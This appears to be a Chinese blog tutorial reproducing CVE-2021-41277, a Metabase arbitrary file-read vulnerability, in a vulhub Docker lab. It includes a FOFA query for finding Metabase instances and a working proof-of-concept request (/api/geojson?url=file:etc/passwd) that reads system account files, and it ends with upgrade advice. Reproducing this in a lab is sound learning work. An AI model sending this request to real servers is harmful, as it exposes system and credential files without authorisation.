vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现

vulhub靶场漏洞复现
CVE-2021-41277 Metabase 信息泄露漏洞复现
fofa语法:

app="Metabase"

环境搭建:

cd vulhub/metabase/CVE-2021-41277
docker-compose up -d    》》打开dockers容器
docker ps -a   》》》查看开放的端口
ipconfig    >>>查看地址
yourip::3000/setup   》》》地址加端口查看服务

vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现_第1张图片

注册一个账号,邮箱什么随便输入,如图
vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现_第2张图片
跳过数据库填写
vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现_第3张图片
最后一步完成操作,然后进入这个页面,如图:
vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现_第4张图片poc:http://your-ip:3000/api/geojson?url=file:etc/passwd etc/passwd 》》这个文件存放着所有用户账号的信息。可以使用 cat /etc/passwd 命令查看该文件内容. /etc/shadow 》》》用于存储 Linux 系统中用户的密码信息,又称为“影子文件”。

etc中有一个passwd 文件,存储了系统中所有用户的基本信息,但由于该文件允许所有用户读取,易导致用户密码泄露,因此 Linux 系统将用户的密码信息从 /etc/passwd 文件中分离出来,并单独放到了此文件中。
漏洞复现:
打开抓包软件,对输入poc的页面进行抓包,并发送数据包即可达成任意文件读取的目的。
vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现_第5张图片

复现结束。
总结及修复建议
修复建议:根据影响版本的信息查看,并升级到最新版本

你可能感兴趣的:(信息安全,网络安全,安全,web安全)